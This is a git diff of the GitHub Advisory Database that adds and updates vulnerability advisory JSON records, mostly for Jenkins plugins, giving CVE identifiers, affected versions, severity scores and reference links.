a/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json b/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json index 80143bd234f12..730b3de8bad9a 100644 --- a/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json +++ b/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" @@ -70,7 +74,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-203" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json b/advisories/github-reviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json new file mode 100644 index 0000000000000..201fda54616fa --- /dev/null +++ b/advisories/github-reviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px6v-6jhf-j46r", + "modified": "2024-01-30T23:13:45Z", + "published": "2023-02-15T21:30:30Z", + "aliases": [ + "CVE-2023-23847" + ], + "summary": "CSRF vulnerability in Synopsys Jenkins Coverity Plugin", + "details": "A cross-site request forgery (CSRF) vulnerability in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:synopsys-coverity" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23847" + }, + { + "type": "WEB", + "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:13:45Z", + "nvd_published_at": "2023-02-15T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json b/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json index d0443846b6192..f207802118b0b 100644 --- a/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json +++ b/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json @@ -75,6 +75,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230427-0007/" diff --git a/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json b/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json index 093c0bb8cb0e2..daac03de6a62c 100644 --- a/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json +++ b/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json b/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json index 3729d61b7747e..76b439a3ec870 100644 --- a/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json +++ b/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0013.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json b/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json index 6298d6e702965..147f8cf27c7d7 100644 --- a/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json +++ b/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0012.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json b/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json index e037dd0c498db..4e65fac0e6fd5 100644 --- a/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json +++ b/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0008.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json b/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json index d68c8977540ed..d68e1d4c3ee21 100644 --- a/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json +++ b/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json @@ -114,6 +114,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json b/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json index 0867229e9f42d..549697f0ef0e9 100644 --- a/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json +++ b/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -56,7 +56,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -78,6 +78,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20861" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1" + }, { "type": "PACKAGE", "url": "https://github.com/spring-projects/spring-framework" diff --git a/advisories/github-reviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json b/advisories/github-reviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json new file mode 100644 index 0000000000000..c27e423d0ca75 --- /dev/null +++ b/advisories/github-reviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gqc-q9mc-6348", + "modified": "2024-01-30T23:13:34Z", + "published": "2023-04-12T18:30:35Z", + "aliases": [ + "CVE-2023-30532" + ], + "summary": "Lack of authentication mechanism in Jenkins TurboScript Plugin webhook", + "details": "A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkinsci.plugins.spoonscript:spoonscript" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30532" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2851" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/04/13/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:13:34Z", + "nvd_published_at": "2023-04-12T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json b/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json index 8fce643964010..51fcd4bc3eefe 100644 --- a/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json +++ b/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -56,7 +56,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { diff --git a/advisories/github-reviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json b/advisories/github-reviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json new file mode 100644 index 0000000000000..66c4d2676416c --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39r8-4962-j7vg", + "modified": "2024-01-30T23:12:41Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35144" + ], + "summary": "Stored XSS vulnerability in Jenkins Maven Repository Server Plugin", + "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "jenkins:repository" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35144" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2951" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:12:41Z", + "nvd_published_at": "2023-06-14T13:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json b/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json index 9d6b42f57852b..5004816e8dc29 100644 --- a/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json +++ b/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://github.com/brycebaril/node-flatnest/issues/4" }, + { + "type": "WEB", + "url": "https://github.com/brycebaril/node-flatnest/commit/27d569baf9d9d25677640edeaf2d13af165868d6" + }, { "type": "PACKAGE", "url": "https://github.com/brycebaril/node-flatnest" diff --git a/advisories/github-reviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json b/advisories/github-reviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json new file mode 100644 index 0000000000000..fb621277a0f25 --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pvw-8q92-hm9w", + "modified": "2024-01-30T23:12:52Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35143" + ], + "summary": "Stored XSS vulnerability in Jenkins Maven Repository Server Plugin", + "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in `pom.xml`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "jenkins:repository" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35143" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3156" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:12:52Z", + "nvd_published_at": "2023-06-14T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json b/advisories/github-reviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json new file mode 100644 index 0000000000000..699c1d6848b87 --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr3p-5fcf-v5m3", + "modified": "2024-01-30T23:13:05Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35142" + ], + "summary": "SSL/TLS certificate validation disabled by default in Jenkins Checkmarx Plugin", + "details": "Jenkins Checkmarx Plugin 2022.4.3 and earlier disables SSL/TLS validation for connections to the Checkmarx server by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.checkmarx.jenkins:checkmarx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2023.2.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2022.4.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35142" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2870" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:13:05Z", + "nvd_published_at": "2023-06-14T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json b/advisories/github-reviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json new file mode 100644 index 0000000000000..a7db7736e2e39 --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whgj-6m78-2gg9", + "modified": "2024-01-30T23:02:44Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35147" + ], + "summary": "Arbitrary file read vulnerability in Jenkins AWS CodeCommit Trigger Plugin", + "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the AWS SQS queue name path parameter in an HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35147" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3099" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:02:36Z", + "nvd_published_at": "2023-06-14T13:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json b/advisories/github-reviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json new file mode 100644 index 0000000000000..3d1cef295f1fb --- /dev/null +++ b/advisories/github-reviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27pr-r7hm-c2rc", + "modified": "2024-01-30T23:03:10Z", + "published": "2023-07-19T18:30:55Z", + "aliases": [ + "CVE-2023-32261" + ], + "summary": "Missing permission check in Jenkins Dimensions Plugin allows enumerating credentials IDs", + "details": "Dimensions Plugin 0.9.3 and earlier does not perform a permission check in an HTTP endpoint.\n\nThis allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.\n\nAn enumeration of credentials IDs in Dimensions Plugin 0.9.3.1 requires the appropriate permissions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:dimensionsscm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.3.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32261" + }, + { + "type": "WEB", + "url": "https://plugins.jenkins.io/dimensionsscm/" + }, + { + "type": "WEB", + "url": "https://portal.microfocus.com/s/article/KM000019297" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3138" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:03:10Z", + "nvd_published_at": "2023-07-19T16:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json b/advisories/github-reviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json new file mode 100644 index 0000000000000..72f0eee4a9bcb --- /dev/null +++ b/advisories/github-reviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8hc6-w44m-wfxf", + "modified": "2024-01-30T23:04:11Z", + "published": "2023-07-19T18:30:56Z", + "aliases": [ + "CVE-2023-32263" + ], + "summary": "Potential leak of credentials in Micro Focus Dimensions CM Jenkins Plugin", + "details": "A potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability could be exploited to retrieve a login certificate if an authenticated user is duped into using an attacker-controlled Dimensions CM server. This vulnerability only applies when the Jenkins plugin is configured to use login certificate credentials.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:dimensionsscm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.17" + }, + { + "fixed": "0.9.3.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32263" + }, + { + "type": "WEB", + "url": "https://plugins.jenkins.io/dimensionsscm/" + }, + { + "type": "WEB", + "url": "https://portal.microfocus.com/s/article/KM000019293" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:04:11Z", + "nvd_published_at": "2023-07-19T16:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json b/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json index b93db4dbb2c67..0fa9278ce7095 100644 --- a/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json +++ b/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2023-117.yaml" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUZO4BQCIY2S2KZYHERQMKURB7AHXDBO/" + }, { "type": "WEB", "url": "https://pypi.org/project/Pygments/" diff --git a/advisories/github-reviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json b/advisories/github-reviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json new file mode 100644 index 0000000000000..ef9ff0b686f43 --- /dev/null +++ b/advisories/github-reviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvjf-4hfg-wr84", + "modified": "2024-01-30T23:04:31Z", + "published": "2023-07-26T15:30:57Z", + "aliases": [ + "CVE-2023-39152" + ], + "summary": "Incorrect control flow in Jenkins Gradle Plugin breaks credentials masking in the build log", + "details": "Always-incorrect control flow implementation in Jenkins Gradle Plugin 2.8 may result in credentials not being masked (i.e., replaced with asterisks) in the build log in some circumstances.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:gradle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.8.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.8" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39152" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3208" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/07/26/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-670" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:04:31Z", + "nvd_published_at": "2023-07-26T14:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json b/advisories/github-reviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json new file mode 100644 index 0000000000000..206b3aa2eff3a --- /dev/null +++ b/advisories/github-reviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px39-5h8c-j3c8", + "modified": "2024-01-30T23:03:23Z", + "published": "2023-07-19T18:30:56Z", + "aliases": [ + "CVE-2023-32262" + ], + "summary": "Exposure of system-scoped credentials in Jenkins Dimensions Plugin", + "details": "Dimensions Plugin 0.9.3 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.\n\nThis allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.\n\nDimensions Plugin 0.9.3.1 defines the appropriate context for credentials lookup.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:dimensionsscm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.3.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32262" + }, + { + "type": "WEB", + "url": "https://plugins.jenkins.io/dimensionsscm/" + }, + { + "type": "WEB", + "url": "https://portal.microfocus.com/s/article/KM000019298" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3143" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:03:23Z", + "nvd_published_at": "2023-07-19T16:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json b/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json index dc9768dc2d535..579cf8bdcf95e 100644 --- a/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json +++ b/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json @@ -28,11 +28,14 